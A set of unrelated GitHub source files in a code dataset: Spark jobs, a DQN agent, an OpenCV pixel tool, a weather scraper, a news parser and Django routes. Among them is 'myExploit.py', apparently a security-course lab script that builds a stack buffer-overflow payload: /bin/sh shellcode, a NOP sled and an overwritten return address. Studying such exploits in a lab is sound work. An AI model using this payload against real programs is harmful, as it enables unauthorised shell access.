\n","repo_name":"ATLS1300/pc02-graffiti-11-emerson-zamensky","sub_path":"PC02_Graffiti_Zamensky.py","file_name":"PC02_Graffiti_Zamensky.py","file_ext":"py","file_size_in_byte":1630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"8796197689","text":"from numpy import array\nfrom math import sqrt\nfrom pyspark.mllib.clustering import KMeans, KMeansModel\nimport time\nfrom pyspark import SparkContext, SparkConf\nfrom pyspark.sql import SparkSession\n\nclass KMeansClustering:\n def __init__(self) -> None:\n pass\n\n def get_spark_context_all_core(self):\n spark = SparkSession.builder \\\n .master(\"local[*]\") \\\n .appName(\"k_means_streaming_example\") \\\n .getOrCreate()\n return spark.sparkContext\n\n def create_clusters(self, input_data):\n def test(l):\n array([float(x) for x in l.split(' ')]) \n\n def rmse(pt):\n c = clusters.centers[clusters.predict(pt)]\n return sqrt(sum([y**2 for y in (c - pt)]))\n\n input_data = input_data.map(lambda l: array([float(x) for x in l.split(' ')]))\n clusters = KMeans.train(input_data, 2, initializationMode=\"random\", maxIterations=8)\n # clusters = KMeans.train(input_data, 5, initializationMode=\"random\", maxIterations=13)\n RMSEE = input_data.map(lambda pt: rmse(pt))\n RMSEE = RMSEE.reduce(lambda m, n: m + n)\n print(\"Root Mean Squared Error = \" + str(RMSEE))\n\nif __name__ == \"__main__\":\n kmeans = KMeansClustering()\n sc = kmeans.get_spark_context_all_core()\n start_time = time.time()\n input_data = sc.textFile(\"input_kmeans_small2_dataset.txt\")\n kmeans.create_clusters(input_data)\n end_time = time.time()\n print(\"\\n\\n ************************************\")\n print(\"\\n\\n Total execution time for large dataset: \", end_time - start_time)\n print(\"\\n\\n ************************************\")\n sc.stop()","repo_name":"hedaanirudh/sparkTestApplication","sub_path":"kmeans_clustering.py","file_name":"kmeans_clustering.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"1432223101","text":"from pyspark.sql import SparkSession\n\ndef word_count(string):\n\tif (string):\n\t\treturn 
len(string.split(\" \"))\n\treturn 0\n\nspark = SparkSession.builder.appName('query4_sql').getOrCreate()\n\nspark.udf.register(\"word_count\", word_count)\n\nmovies = spark.read.format('csv') \\\n\t.options(header='false', inferSchema='true') \\\n\t.load('hdfs://master:9000/movies/data/movies.csv')\n\nmovies.registerTempTable('movies')\n\ncleaned_movies = \\\n\t\"SELECT _c0 AS Movie, _c2 AS Summary, YEAR(_c3) AS Date \" + \\\n\t\"FROM movies \" + \\\n\t\"WHERE YEAR(_c3) >= 2000\"\n\ntemp1 = spark.sql(cleaned_movies)\ntemp1.registerTempTable('cleaned_movies')\n\ngenres = spark.read.format('csv') \\\n\t.options(header='false', inferSchema='true') \\\n\t.load('hdfs://master:9000/movies/data/movie_genres.csv')\n\ngenres.registerTempTable('genres')\n\ncleaned_genres = \\\n\t\"SELECT _c0 as Movie, _c1 as Genre \" + \\\n\t\"FROM genres \" + \\\n\t\"WHERE _c1 == 'Drama'\"\n\ntemp3 = spark.sql(cleaned_genres)\ntemp3.registerTempTable('cleaned_genres')\n\nmovies_genres = \\\n\t\"SELECT word_count(M.Summary) AS Word_Count, M.Date AS Date \" + \\\n\t\"FROM cleaned_movies AS M, cleaned_genres AS G \" + \\\n\t\"WHERE M.Movie == G.Movie\"\n\ntemp4 = spark.sql(movies_genres)\ntemp4.registerTempTable('movies_genres')\n\ngrouped_mg = \\\n\t\"SELECT AVG(Word_Count) AS Word_Count, Date \" + \\\n\t\"FROM movies_genres \" + \\\n\t\"GROUP BY Date\"\n\ntemp5 = spark.sql(grouped_mg)\ntemp5.registerTempTable('grouped_mg')\n\nsqlResult = \\\n\t\"SELECT \" + \\\n\t\t\"(CASE WHEN Date < 2005 THEN '2000-2004' \" + \\\n\t\t\"WHEN Date Between 2005 AND 2009 THEN '2005-2009' \" + \\\n\t\t\"WHEN Date BETWEEN 2010 AND 2014 THEN '2010-2014' \" + \\\n\t\t\"WHEN Date > 2014 THEN '2015-2019' END) AS Date_Group, \" + \\\n\t\"AVG(Word_Count) AS Average_WC \" + \\\n\t\"FROM grouped_mg \" + \\\n\t\"GROUP BY Date_Group ORDER BY Date_Group\"\n\nres = spark.sql(sqlResult).coalesce(1).write.json('hdfs://master:9000/movies/output/query4_sql.out')\n","repo_name":"sonqo/ntua-lambda","sub_path":"7-advanced-database-systems/SQL/SummaryWordCount.py","file_name":"SummaryWordCount.py","file_ext":"py","file_size_in_byte":1860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"7615898360","text":"from net import Net\nfrom parameters import Parameters\nimport numpy as np\nimport gzip\nimport pickle\nimport argparse\n\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\n\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib import cm\nfrom matplotlib.ticker import LinearLocator, FormatStrFormatter\n\nfrom interval_bisection import *\nfrom queue import Queue\nfrom diffae import DiffAE\n\nmarker_size = mpl.rcParams['lines.markersize'] ** 2\n\nparser = argparse.ArgumentParser()\nparser.add_argument('file_name', metavar='YYYYMMDD_HHMMSS', type=str, nargs='+',\n help='file name of the pickled parameters object')\n\nargs = parser.parse_args()\n\nfile_name = args.file_name[0]\nf = gzip.open(f'./data/quadratic/{file_name}', 'rb')\nparams = pickle.load(f)\nf.close()\n\nparameters = (params.weights, params.biases)\nnet = Net(params.layers, parameters=parameters)\nprint(params.layers)\n\n# initialize the data\nif isinstance(params.training_data, list):\n\n n = len(params.training_data)\n\n data = np.zeros((2, n))\n\n for i in range(len(params.training_data)):\n\n point = params.training_data[i]\n\n data[:, i] = point[0]\n\nelse:\n\n n = 100\n\n x = np.arange(0.1, 0.9, 0.8/n)\n y = 1 * (x - x**2)\n\n data = np.stack([x, y])\n\n# compute output manifold\noutput = np.zeros((2, n))\n\nfor i 
in range(n):\n\n output[:, i] = net.feedforward( data[:, i] )\n\nxo = output[0, :]\nyo = output[1, :]\n\n# compute vector field\nxi = np.arange(0, 1, 2/n)\nyi = np.arange(0, 0.5, 2/n)\n\nm = yi.shape[0]\n\nxx, yy = np.meshgrid(xi, yi)\nuu, vv = np.meshgrid(xi, yi)\n\nfor i in range(m):\n\n for j in range(xi.shape[0]):\n\n output = net.feedforward( np.array([xx[i, j], yy[i, j]]) )\n\n uu[i, j] = output[0] - xx[i, j]\n vv[i, j] = output[1] - yy[i, j]\n\n# interval bisection and newton\nf = DiffAE(net)\n\nu = Interval(0, 1)\nv = Interval(0, 1)\ninit = np.array([u, v])\nqueue = Queue()\nqueue.append(init)\n\nverified = interval_bisection(f, queue)\n\nfig, ax = plt.subplots(figsize=(12, 6))\n\n#ax.set_xlim([0, 1])\n#ax.set_ylim([0, 1])\n\nrectangles(ax, verified)\n\n# plot results\nx = data[0,:]\ny = data[1,:]\nax.scatter(x, y, s=marker_size/4, c='b', label='input')\nax.scatter(xo, yo, s=marker_size/4, c='g', label='output')\nq = ax.quiver(xx, yy, uu, vv, color='tab:gray')\n\nax.legend()\nplt.title('number of verified intervals = %d'%len(verified))\nax.set(xticklabels=[], yticklabels=[], xticks=[], yticks=[])\n\n# a very simple ode solver using Euler's method\ndef onclick(event):\n print('%s click: button=%d, x=%d, y=%d, xdata=%f, ydata=%f' %\n ('double' if event.dblclick else 'single', event.button,\n event.x, event.y, event.xdata, event.ydata))\n\n trace_x = [event.xdata]\n trace_y = [event.ydata]\n eps = 1\n h = 0.01\n while eps > 0.001:\n x_prev = np.array([trace_x[-1], trace_y[-1]])\n\n output = net.feedforward(x_prev)\n\n dx = output - x_prev\n\n x_curr = x_prev + h * dx\n\n trace_x.append(x_curr[0])\n trace_y.append(x_curr[1])\n\n eps = np.linalg.norm(dx)\n\n ax.plot(trace_x, trace_y, c='r')\n plt.show()\n\ncid = fig.canvas.mpl_connect('button_press_event', onclick)\nplt.show()\n#plt.savefig(f'./figures/quadratic/{file_name}_newton.png')\n","repo_name":"ajcook14/autoencoders","sub_path":"read_quadratic.py","file_name":"read_quadratic.py","file_ext":"py","file_size_in_byte":3216,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"25590276518","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Mar 21 13:42:07 2023\r\n\r\n@author: clemm\r\n\"\"\"\r\nimport torch \r\nimport torch.nn as nn \r\nimport numpy as np \r\nimport random\r\nfrom collections import namedtuple, deque\r\nimport matplotlib.pyplot as plt \r\n\r\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\r\n\r\nTransition = namedtuple('Transition',\r\n ('state', 'action', 'next_state', 'reward', 'dones'))\r\nclass Policy(nn.Module): \r\n def __init__(self, input_dim, output_dim):\r\n super(Policy, self).__init__()\r\n self.layers = nn.Sequential(nn.Linear(input_dim, 64),\r\n nn.Tanh(),\r\n nn.Linear(64,64),\r\n nn.Tanh(),\r\n nn.Linear(64, output_dim)) \r\n\r\n return \r\n \r\n def forward(self, x):\r\n out = self.layers(x)\r\n return out\r\n \r\nclass Replay(): \r\n def __init__(self, size): \r\n self.size = size \r\n self.memory = deque([], maxlen=size)\r\n \r\n return \r\n \r\n def store(self, episode): \r\n self.memory.append(episode)\r\n return \r\n \r\n def sample(self, batch_size): \r\n sample = random.sample(self.memory, batch_size)\r\n return sample\r\n \r\n \r\nclass DQN(): \r\n def __init__(self, env, gamma, lr, eps, batch, iters, use_memory, update_every): \r\n #discount factor\r\n self.gamma = gamma\r\n #learn rate\r\n self.learn_rate = lr\r\n #for epsilon greedy action selection and epsilon decay \r\n self.eps_start = eps \r\n 
self.eps = self.eps_start\r\n self.min_eps = 0.0\r\n \r\n #training hyperparameters\r\n self.iters = iters\r\n self.batch_size = batch \r\n self.use_memory = use_memory \r\n self.update = update_every \r\n \r\n #environment information \r\n self.env = env\r\n self.act_space = env.num_actions \r\n self.obs_space = env.num_states\r\n \r\n #initialize policy and target networks \r\n self.policy = Policy(self.obs_space, self.act_space)\r\n self.target = Policy(self.obs_space, self.act_space)\r\n #copy parameters of policy to the target network \r\n self.target.load_state_dict(self.policy.state_dict())\r\n self.target.eval()\r\n \r\n #initialize replay buffer \r\n if self.use_memory == True: \r\n self.memory = Replay(10000)\r\n else: \r\n #if buffer not in use, set max size = to batch size\r\n self.memory = Replay(self.batch_size)\r\n \r\n #optimizer and loss function \r\n self.opt = torch.optim.Adam(self.policy.parameters(), lr = self.learn_rate)\r\n self.loss_fun = nn.MSELoss()\r\n \r\n return \r\n \r\n def get_action(self, state): \r\n #get action from policy network \r\n with torch.no_grad(): \r\n action = self.policy(state).argmax(1)\r\n return action.item()\r\n \r\n def greedy_action(self, s): \r\n #epsilon greedy action selection \r\n with torch.no_grad():\r\n p = np.random.random()\r\n \r\n if p < self.eps: \r\n a = random.randrange(self.act_space)\r\n \r\n else: \r\n a = self.get_action(s)\r\n\r\n return a\r\n \r\n \r\n def update_model(self):\r\n #function to update the network model \r\n #sample batch from replay buffer\r\n batch = self.memory.sample(self.batch_size)\r\n batch = Transition(*zip(*batch))\r\n \r\n states = torch.cat([s.to(device) for s in batch.state])\r\n new_states = torch.cat([ns.to(device) for ns in batch.next_state])\r\n actions = torch.cat([a.to(device) for a in batch.action])\r\n rewards = torch.cat([r.to(device) for r in batch.reward])\r\n dones = torch.tensor(batch.dones).float()\r\n \r\n #calculate state-action values of current state\r\n Q = self.policy(states).gather(1, actions.unsqueeze(1))\r\n \r\n #calculate expected values of next states using target network \r\n next_values = (1-dones)*self.target(new_states).max(1)[0].detach()\r\n Q_tar = rewards + self.gamma*(next_values)\r\n \r\n loss = self.loss_fun(Q, Q_tar.unsqueeze(1))\r\n self.opt.zero_grad() \r\n loss.backward()\r\n torch.nn.utils.clip_grad_value_(self.policy.parameters(), 1)\r\n self.opt.step()\r\n \r\n \r\n\r\n def train(self):\r\n train_return = []\r\n\r\n step = 0\r\n for i in range(self.iters): \r\n s = self.env.reset()\r\n episode = deque([])\r\n s = torch.tensor(s).float().unsqueeze(0)\r\n ep_step = 0\r\n train_rew = 0\r\n for j in range(self.env.max_num_steps): \r\n #step through environment \r\n a = self.greedy_action(s)\r\n s_new, r, done = self.env.step(a)\r\n s_new = torch.tensor(s_new).float().unsqueeze(0)\r\n r = torch.tensor([r]).float()\r\n train_rew += r.item()\r\n a = torch.tensor([a])\r\n \r\n #store transition in replay buffer \r\n t = Transition(s, a, s_new, r, done)\r\n self.memory.store(t)\r\n s = s_new\r\n \r\n \r\n if len(self.memory.memory) < self.batch_size: \r\n #if there are not enough samples in memory, pass \r\n pass\r\n else: \r\n self.update_model()\r\n \r\n if done: \r\n break\r\n \r\n train_return.append(train_rew)\r\n \r\n \r\n #linear epsilon decay \r\n self.eps =np.max([self.min_eps, ((self.min_eps - self.eps_start)/(self.iters*.95))*i + self.eps_start])\r\n \r\n if i % self.update == 0: \r\n #copy policy parameters to target network \r\n 
self.target.load_state_dict(self.policy.state_dict())\r\n ''' \r\n fig, ax = plt.subplots()\r\n it = np.linspace(0, self.iters, self.iters)\r\n ax.plot(it, train_return)\r\n ax.set_ylim([-10, 100])\r\n '''\r\n return self.policy, train_return\r\n \r\n\r\n \r\n ","repo_name":"uiuc-ae598-rl-2023-spring/hw2-dqn-emmac4","sub_path":"Algorithm.py","file_name":"Algorithm.py","file_ext":"py","file_size_in_byte":6364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"}
+{"seq_id":"12035065231","text":"# Python Program To Access Pixels Using OpenCV\n# Author:- Ajinkya Patil\n# Github:- https://github.com/Ajinkya7poppyi/\n\nimport cv2\n\n#Get pixel value at location\ndef get_pixel(row, col, index):\n\t#Check if image is 3-dimensional\n\tif index is not None:\n\t\t#Access value at input_img(row,col) in index space\n\t\tvalue = input_img[row, col, index]\n\telse:\n\t\t#Access value at input_img(row,col)\n\t\tvalue = input_img[row, col]\n\t\n\treturn value\t\n\t\n#Set pixel value at location\t\ndef set_pixel(row, col, index, value):\n\t#Check if image is 3-dimensional\n\tif index is not None:\n\t\t#Pass value to input_img(row,col) in index space\n\t\tinput_img[row, col, index] = value\n\telse:\n\t\t#Pass value to input_img(row,col)\n\t\tinput_img[row, col] = value\n\t\n#Path of image file to be read\nimage_read_path=\"H:/img.jpg\"\n\n#Window Name\nwindow_name=\"Input Image\"\n\n#Time to wait for\nwait_time=0\n\n#Load an image\n#cv2.IMREAD_COLOR = Default flag for imread. Loads color image.\n#cv2.IMREAD_GRAYSCALE = Loads image as grayscale.\n#cv2.IMREAD_UNCHANGED = Loads image which has alpha channels.\n#cv2.IMREAD_ANYCOLOR = Loads image in any possible format\n#cv2.IMREAD_ANYDEPTH = Loads image in 16-bit/32-bit otherwise converts it to 8-bit\ninput_img = cv2.imread(image_read_path,cv2.IMREAD_UNCHANGED)\n\n#Check if image is loaded \nif input_img is not None:\n\t#Create a Window\n\t#cv2.WINDOW_NORMAL = Enables window to resize.\n\t#cv2.WINDOW_AUTOSIZE = Default flag. Auto resizes window size to fit an image.\n\tcv2.namedWindow(window_name,cv2.WINDOW_NORMAL)\n\t#Show image in window\n\tcv2.imshow(window_name,input_img)\n\t#Wait until user enters any key\n\tcv2.waitKey(wait_time)\n\t#Destroy Window\n\tcv2.destroyWindow(window_name)\n\t\n\tprint (\"Hello, Welcome To Pixel Operations\")\n\t#Get the image dimension in a tuple\n\timg_dimension= input_img.shape\n\t\n\tprint (\"Input image is \" + str(len(img_dimension)) + \" dimensional\") \n\tprint (\"Input Image rows: \" + str(img_dimension[0]) + \" cols: \" + str(img_dimension[1]))\n\t\n\t#Loop Forever\n\twhile True:\n\t\t#Ask User to choose operation\n\t\tprint (\"Choose Your Operation:\")\n\t\tprint (\"1. Get Pixel\")\n\t\tprint (\"2. Set Pixel\")\n\t\tprint (\"3. Exit\")\n\t\tchoice = None\t\n\t\t#Loops until user enters valid number\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\tchoice = int(input(\"Your Option: \"))\n\t\t\t\tbreak\n\t\t\texcept:\n\t\t\t\tprint(\"Please Enter Valid Number\")\t\t\n\t\t\n\t\t#Exit from the while loop\n\t\tif choice == 3:\n\t\t\tbreak\n\t\t\n\t\t#Get data from user if valid operations\n\t\tif choice == 1 or choice == 2:\n\t\t\t#Get row from user\t\n\t\t\trow = None\n\t\t\t#Loops until user enters valid number\n\t\t\twhile True:\n\t\t\t\ttry:\n\t\t\t\t\trow = int(input(\"Enter Row:\"))\n\t\t\t\t\tbreak\n\t\t\t\texcept:\n\t\t\t\t\tprint(\"Please Enter Valid Number\")\n\t\t\n\t\t\t#if user input is greater than actual rows set it to max rows value\n\t\t\tif row >= img_dimension[0]:\n\t\t\t\trow = img_dimension[0]-1\n\t\t\n\t\t\t#Get col from user\n\t\t\tcol = None\n\t\t\t#Loops until user enters valid number\n\t\t\twhile True:\n\t\t\t\ttry:\n\t\t\t\t\tcol = int(input(\"Enter Column:\"))\n\t\t\t\t\tbreak\n\t\t\t\texcept:\n\t\t\t\t\tprint(\"Please Enter Valid Number\")\n\t\t\t#if user input is greater than actual cols set it to max cols value\n\t\t\tif col >= img_dimension[1]:\n\t\t\t\tcol = img_dimension[1]-1\n\t\t\n\t\t\t#Set indx to None considering 2 dimensional image\n\t\t\tindx = None\n\t\n\t\t\t#If image has more than 2 dimensions\n\t\t\tif len(img_dimension) > 2:\n\t\t\t\t#Get index from user\n\t\t\t\t#Loops until user enters valid number\n\t\t\t\twhile True:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tindx = int(input(\"Enter Index:\"))\n\t\t\t\t\t\tbreak\n\t\t\t\t\texcept:\n\t\t\t\t\t\tprint(\"Please Enter Valid Number\")\n\t\t\t\t#if user input is greater than actual indices set it to max index value\n\t\t\t\tif indx >= img_dimension[2]:\n\t\t\t\t\tindx = img_dimension[2]-1\n\t\n\t\t#if user chooses to get value\n\t\tif choice == 1:\n\t\t\tprint (\"Value is \" + str(get_pixel(row, col, indx)))\n\t\t\n\t\t#if user chooses to set value\n\t\telif choice == 2:\n\t\t\tval = None\n\t\t\t#Get value to set from user\n\t\t\t#Loops until user enters valid number\n\t\t\twhile True:\n\t\t\t\ttry:\n\t\t\t\t\tval = int(input(\"Enter Value:\"))\n\t\t\t\t\tbreak\n\t\t\t\texcept:\n\t\t\t\t\tprint(\"Please Enter Valid Number\")\n\t\t\t#call set_pixel function\n\t\t\tset_pixel(row, col, indx, val)\n\t\t\t#Create a Window\n\t\t\tcv2.namedWindow(window_name,cv2.WINDOW_NORMAL)\n\t\t\t#Show image in window\n\t\t\tcv2.imshow(window_name,input_img)\n\t\t\t#Wait until user enters any key\n\t\t\tcv2.waitKey(wait_time) \n\t\t\t#Destroy Window\n\t\t\tcv2.destroyWindow(window_name)\n\t\t\t\n\t\telse:\n\t\t\tprint (\"Please Select A Valid Operation\")\nelse:\n\tprint (\"Please Check The Path of Input File\")","repo_name":"Ajinkya7poppyi/ImageProcessing","sub_path":"Access_Pixels/access_pixels.py","file_name":"access_pixels.py","file_ext":"py","file_size_in_byte":4371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"}
+{"seq_id":"582976704","text":"\n\n\nimport requests\nimport time\n\nfrom bs4 import BeautifulSoup\nimport smtplib\nimport email.mime\nimport datetime\n\n\n\nimport requests\nimport pyttsx3\nimport bs4\nfrom bs4 import BeautifulSoup\nfrom urllib.request import urlopen\n\ntext_speech = pyttsx3.init()\nimport time \n\nfor i in range(60):\n headers = {\n 'User-Agent':\"Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Mobile Safari/537.36 Edg/94.0.992.31'\"\n }\n \n url = \"https://www.bbc.com/weather/your-city-id\" #Enter the weather link of 
the city that needs to be checked \n t = time.localtime()\n current_hr = time.strftime(\"%H:%M\", t)\n text_speech.say(current_hr)\n text_speech.runAndWait()\n cnt5=''\n cnt6=''\n cnt1 =''\n r = requests.get(url,{'headers':headers})\n soup = bs4.BeautifulSoup(r.text,\"html.parser\")\n tag = soup.find('h1', attrs={\"id\": \"wr-location-name-id\"})\n cnt1+=tag.text\n tag = soup.find('span', attrs={\"class\": \"wr-value--temperature--c\"})\n cnt5+=tag.text\n tag = soup.find('div', attrs={\"class\": \"wr-day__weather-type-description wr-js-day-content-weather-type-description wr-day__content__weather-type-description--opaque\"})\n cnt6+=tag.text\n final = \"The temperature is \"+ cnt5 + \" now\"\n text_speech.say(cnt1)\n text_speech.runAndWait()\n text_speech.say(final)\n text_speech.runAndWait()\n text_speech.say(cnt6)\n text_speech.runAndWait()\n print(current_hr)\n time.sleep(600) #no of minutes \n \n","repo_name":"rubenskx/weather_text_scraping","sub_path":"web_scripting_newloop.py","file_name":"web_scripting_newloop.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"14390483030","text":"# To run the shell code in python\nshellcode= (\n\"\\x31\\xc0\" # xorl %eax,%eax\n\"\\x50\" # pushl %eax\n\"\\x68\"\"//sh\" # pushl $0x68732f2f\n\"\\x68\"\"/bin\" # pushl $0x6e69622f\n\"\\x89\\xe3\" # movl %esp,%ebx\n\"\\x50\" # pushl %eax\n\"\\x53\" # pushl %ebx\n\"\\x89\\xe1\" # movl %esp,%ecx\n\"\\x99\" # cdq\n\"\\xb0\\x0b\" # movb $0x0b,%al\n\"\\xcd\\x80\" # int $0x80\n).encode('latin-1')\n\n# ------------------------ GNU DEBUGGER PARAMETERS --------------------\n\n\n# ----------------- Our parameters ------------------------\n\n# Paramaters\nFILE_SIZE = 900 # EXAMPLE, Here, file size is 300 bytes\nBUFFER_SIZE = 400 # Here, the buffer size is 100 bytes\n\n# Addresses Calculation\nEBP = 0xbfffec18\nBUFFER = 0xbfffea7c\nDIFFERENCE = EBP - BUFFER\nADDITION_TO_EBP = DIFFERENCE + 8 + 87 # Total:507 is added\n\n# print(\"DIFFERENCE = \" + str(DIFFERENCE))\n\n\n# --------------------- Crafting the bad file begins -------------------\nBAD_FILE_NAME = \"input\"\n\n# Store things in the array named \"contents_badFile\"\n\n# 1. We make the WHOLE file as NOP instruction [0x90 instruction]\ncontents_badFile = bytearray(0x90 for i in range(FILE_SIZE))\n\n# 2. We make the last part of contents_badFile as the shellcode\n\nstarting_idx_shellcode = FILE_SIZE - len(shellcode) # 2.1 Obtain the starting index of the shell code = len(full_file) - len(shell_code)\ncontents_badFile[starting_idx_shellcode:FILE_SIZE] = shellcode # 2.2 Fill from start_idx_shellcode:endOfFile as the shellcode\n\n# 3. Obtain the the return address of where to point to (inside NOP region) ...\nreturnAddressOfNOPRegion = EBP + ADDITION_TO_EBP\ncontents_badFile[DIFFERENCE+4:DIFFERENCE+8] = (returnAddressOfNOPRegion).to_bytes(4,byteorder='little')\n\n\n# 4. 
Write to the output file\n#write\nwith open(BAD_FILE_NAME,'wb') as f:\n f.write(contents_badFile)\n","repo_name":"Mahim1997/Assignments-Github","sub_path":"Security Sessional/Practice_BufferOverflow/ONLINE Practice on Sunday/myExploit.py","file_name":"myExploit.py","file_ext":"py","file_size_in_byte":1742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"9899649089","text":"import urllib.request\nfrom urllib.request import Request\nfrom random import randint\nfrom bs4 import BeautifulSoup\nfrom miscellanea.logging import FakeTestLogger\nfrom ml.text.StringCleaner import StringCleaner\nfrom miscellanea.RequestHeaderGenerator import RequestHeaderGenerator\n\n\nclass FactycomuaParser:\n\n def __init__(self, app_logger):\n self.logger = app_logger\n\n def parse(self, url):\n try:\n headers = RequestHeaderGenerator.get_headers()\n request = Request(url, headers=headers)\n content = urllib.request.urlopen(request).read().decode('utf-8')\n soup = BeautifulSoup(content, 'html5lib')\n\n article_text = \"\"\n\n paragraphs = soup.findAll(\"h1\")\n for element in paragraphs:\n article_text += \"\\n\" + str(element.text)\n\n paragraphs = soup.findAll(\"div\", {\"class\": \"kv-post-content-text\"})\n for element in paragraphs:\n for el in element:\n if hasattr(el, \"text\") & hasattr(el, \"name\"):\n if el.name == 'p':\n article_text += \"\\n\" + str(el.text)\n except Exception as e:\n message = self.logger.make_message_link(\"FactycomuaParser\", e, url)\n self.logger.write_message(message)\n return 0, \"\"\n article_text = StringCleaner.clean(article_text)\n return 1, article_text\n\n\nif __name__ == \"__main__\":\n logger = FakeTestLogger.FakeTestLogger()\n my_parser = FactycomuaParser(logger)\n # success, article = my_parser.parse('https://fakty.com.ua/ua/proisshestvija/20190203-pozhezha-na-lisovij-ye'\n # '-zagroza-obvalu-konstruktsij/')\n success, article = my_parser.parse('https://fakty.com.ua/ua/ukraine/20191206-v-ukrayini-vvedut-systemu-kontrolyu-nad-inozemnymy-investytsiyamy-v-opk-mzs/')\n print(article)\n","repo_name":"raiyin/spiderstat","sub_path":"gather/parsing/Ukraine/FactycomuaParser.py","file_name":"FactycomuaParser.py","file_ext":"py","file_size_in_byte":1910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"36501325394","text":"# coding: utf-8\nfrom django.conf.urls import url\nfrom phone import views\n\nurlpatterns = [\n url(r'^test/$', views.test, name='test'),\n url(r'^openid/$', views.openid, name='openid'),\n\n url(r'^sendcode/(?P[01])/(?P[01])/$', views.sendcode, name='sendcode'),\n url(r'^registe/(?P[12])/$', views.registe, name='registe'),\n url(r'^login/$', views.login_, name='login'),\n url(r'^resetpasswd/$', views.resetpasswd, name='resetpasswd'),\n url(r'^modifypasswd/$', views.modifypasswd, name='modifypasswd'),\n url(r'^logout/$', views.logout, name='logout'),\n\n\n url(r'^name/$', views.name, name='name'),\n url(r'^userinfo/$', views.userinfo, name='userinfo'),\n url(r'^leftslide/$', views.leftslide, name='leftslide'),\n url(r'^photo/$', views.photo, name='photo'),\n url(r'^bg/$', views.bg, name='bg'),\n url(r'^nickname/$', views.nickname, name='nickname'),\n url(r'^company/$', views.company, name='company'),\n url(r'^position/$', views.position, name='position'),\n url(r'^addr/$', views.addr, name='addr'),\n url(r'^weixin/$', views.weixin, name='weixin'),\n \n url(r'^hasinform', views.hasinform, name='hasinform'), # lindyang\n url(r'^hastopic/$', 
views.hastopic, name='hastopic'),\n\n url(r'^inform/(?P\\d+)/$', views.inform, name='inform'),\n url(r'^readinform(?P[1-9]\\d*)/$', views.readinform, name='readinform'),\n\n url(r'^home/$', views.home, name='home'),\n url(r'^customservice/$', views.customservice, name='customservice'),\n url(r'^credit/$', views.credit, name='credit'),\n \n url(r'^cursor/$', views.cursor, name='cursor'),\n url(r'^project/(?P[01234])/(?P\\d+)/$', views.project, name='project'),\n\n url(r'^auth/$', views.auth, name='auth'),\n url(r'^authpersonoptional/$', views.authpersonoptional, name='authpersonoptional'),\n url(r'^myauth/$', views.myauth, name='myauth'),\n\n url(r'^like/(?P[1-9]\\d*)/(?P[01])/$', views.projectlike, name='projectlike'),\n url(r'^uploadlike/(?P[1-9]\\d*)/(?P[01])/$', views.uploadlike, name='uploadlike'),\n url(r'^collect/(?P[1-9]\\d*)/(?P[01])/$', views.projectcollect, name='projectcollect'),\n url(r'^uploadcollect/(?P[1-9]\\d*)/(?P[01])/$', views.uploadcollect, name='uploadcollect'),\n url(r'^collectfinance/(?P\\d+)/$', views.collectfinance, name='collectfinance'),\n url(r'^collectfinancing/(?P\\d+)/$', views.collectfinancing, name='collectfinancing'),\n url(r'^collectfinanced/(?P\\d+)/$', views.collectfinanced, name='collectfinanced'),\n url(r'^collectupload/(?P\\d+)/$', views.collectupload, name='collectupload'),\n\n\n\n url(r'^upload/$', views.upload, name='upload'),\n\n url(r'^newstype/$', views.newstype, name='newstype'),\n url(r'^news/(?P[1-9]\\d*)/(?P\\d+)/$', views.news, name='news'),\n url(r'^newsread/(?P[1-9]\\d*)/$', views.newsread, name='newsread'),\n url(r'^newsshare/(?P[1-9]\\d*)/$', views.newsshare, name='newsshare'),\n url(r'^newssearch/(?P\\d+)/$', views.newssearch, name='newssearch'),\n url(r'^sharenews/(?P[1-9]\\d*)/$', views.sharenews, name='sharenews'),\n\n url(r'^feeling/(?P\\d+)/$', views.feeling, name='feeling'),\n\n url(r'^wantinvest/(?P[1-9]\\d*)/(?P[01])/$', views.wantinvest, name='wantinvest'),\n\n url(r'^projectdetail/(?P[1-9]\\d*)/$', views.projectdetail, name='projectdetail'),\n url(r'^uploaddetail/(?P[1-9]\\d*)/$', views.uploaddetail, name='uploaddetail'),\n url(r'^financeplan/(?P[1-9]\\d*)/$', views.financeplan, name='financeplan'),\n url(r'^member/(?P[1-9]\\d*)/$', views.member, name='member'),\n url(r'^investlist/(?P[1-9]\\d*)/$', views.investlist, name='investlist'),\n url(r'^attend/(?P[1-9]\\d*)/$', views.attend, name='attend'),\n\n url(r'^investor/(?P[012])/(?P\\d+)/$', views.investor, name='investor'),\n url(r'^authdetail/(?P[1-9]\\d*)/$', views.authdetail, name='authdetail'),\n url(r'^institutedetail/(?P[1-9]\\d*)/$', views.institutedetail, name='institutedetail'),\n\n url(r'^thinktank/(?P\\d+)/$', views.thinktank, name='thinktank'),\n url(r'^thinktankdetail/(?P[1-9]\\d*)/$', views.thinktankdetail, name='thinktankdetail'),\n\n url(r'^feedback/$', views.feedback, name='feedback'),\n url(r'^keyword/$', views.keyword, name='keyword'),\n url(r'^projectsearch/(?P\\d+)/$', views.projectsearch, name='projectsearch'),\n url(r'^userinfo/((?P[1-9]\\d*)/)?$', views.userinfo, name='userinfo'),\n url(r'^myupload/(?P\\d+)/$', 